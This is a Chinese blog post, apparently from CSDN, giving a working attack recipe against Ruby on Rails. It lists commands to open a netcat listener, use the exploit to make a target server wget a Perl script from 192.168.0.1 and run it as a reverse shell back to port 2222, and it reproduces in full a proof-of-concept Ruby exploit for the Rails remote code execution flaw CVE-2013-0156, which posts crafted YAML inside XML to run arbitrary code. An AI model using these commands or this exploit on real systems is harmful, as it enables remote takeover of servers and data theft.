Ruby 小黑

最新推荐文章于 2019-10-17 21:28:46 发布

chinalgf

最新推荐文章于 2019-10-17 21:28:46 发布

阅读量651

点赞数

CC 4.0 BY-SA版权

分类专栏： Ruby

本文链接：https://blog.youkuaiyun.com/morning_pig/article/details/8575201

Ruby 专栏收录该内容

2 篇文章

订阅专栏

打开监听模式，用于入站监听
$ nc -l 2222

上传文件到远程服务器
$ http://place3.ru/ "IO.popen('wget http://192.168.0.1/nc.pl -O /tmp/1.pl')"

在远程服务器上执行文件
$ ruby ./rails_rce.rb http://place3.ru/ "IO.popen('perl /tmp/1.pl 192.168.0.1 2222')"

rails_rce.rb:

#!/usr/bin/env ruby
#
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156)
#
# ## Advisory
#
# https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion
#
# ## Caveats
#
# * Executes the code four times.
#
# ## Synopsis
#
# $ rails_rce.rb URL PARAM RUBY
#
# ## Dependencies
#
# $ gem install ronin-support
#
# ## Example
#
# $ rails_rce.rb http://localhost:3000/secrets/search secret "puts 'lol'"
#
# ### config/routes.rb
#
# resources :secrets do
# collection do
# post :search
# end
# end
#
# ### app/controllers/secrets_controller.rb
#
# def search
# @secret = secret.find_by_secret(params[:secret])
#
# render :json => @secret
# end
#
# ## License
#
# Copyright (c) 2013 Postmodern
#
# This exploit is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This exploit is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this exploit. If not, see <http://www.gnu.org/licenses/>.
#
# ## Shoutz
#
# drraid, cd, px, sanitybit, sysfail, trent, dbcooper, goldy, coderman, letch,
# starik, toby, jlt, HockeyInJune, cloud, zek, natron, amesc, postmodern,
# mephux, nullthreat, evoltech, flatline, r0bglesson, @ericmonti, @bascule,
# @charliesome, @homakov, @envygeek, @chendo, @bitsweat (for creating the vuln),
# @tenderlove (for fixing it), Fun Town Auto, garbage pail kids, hipsters,
# the old Jolly Inn, Irvin Santiago, that heavy metal dude who always bummed
# cigarettes off us, SophSec crew and affiliates.
#
 
require 'ronin/network/http'
require 'ronin/ui/output'
require 'yaml'
 
include Ronin::Network::HTTP
include Ronin::UI::Output::Helpers
 
unless ARGV.length == 3
$stderr.puts "usage: #{$0} URL PARAM RUBY"
exit -1
end
 
url = ARGV[0]
param = ARGV[1]
code = ARGV[2]
 
escaped_code = "foo; #{code}\n__END__\n"
 
yaml = %{
--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection
? #{escaped_code.to_yaml.sub('--- ','').chomp}
: !ruby/object:OpenStruct
table:
:defaults:
:action: create
:controller: foos
:required_parts: []
:requirements:
:action: create
:controller: foos
:segment_keys:
- :format
modifiable: true
}.strip
 
xml = %{
<?xml version="1.0" encoding="UTF-8"?>
<#{param} type="yaml">#{yaml}</#{param}>
}.strip
 
print_info "POSTing #{code} to #{url} ..."
 
response = http_post(
:url => url,
:headers => {
:content_type => 'text/xml',
:x_http_method_override => 'get'
},
:body => xml
)
 
print_debug "Received #{response.code} response"
 
case response.code
when '200' then print_info "Success!"
when '404' then print_error "Not found"
when '500' then print_error "Error!"
end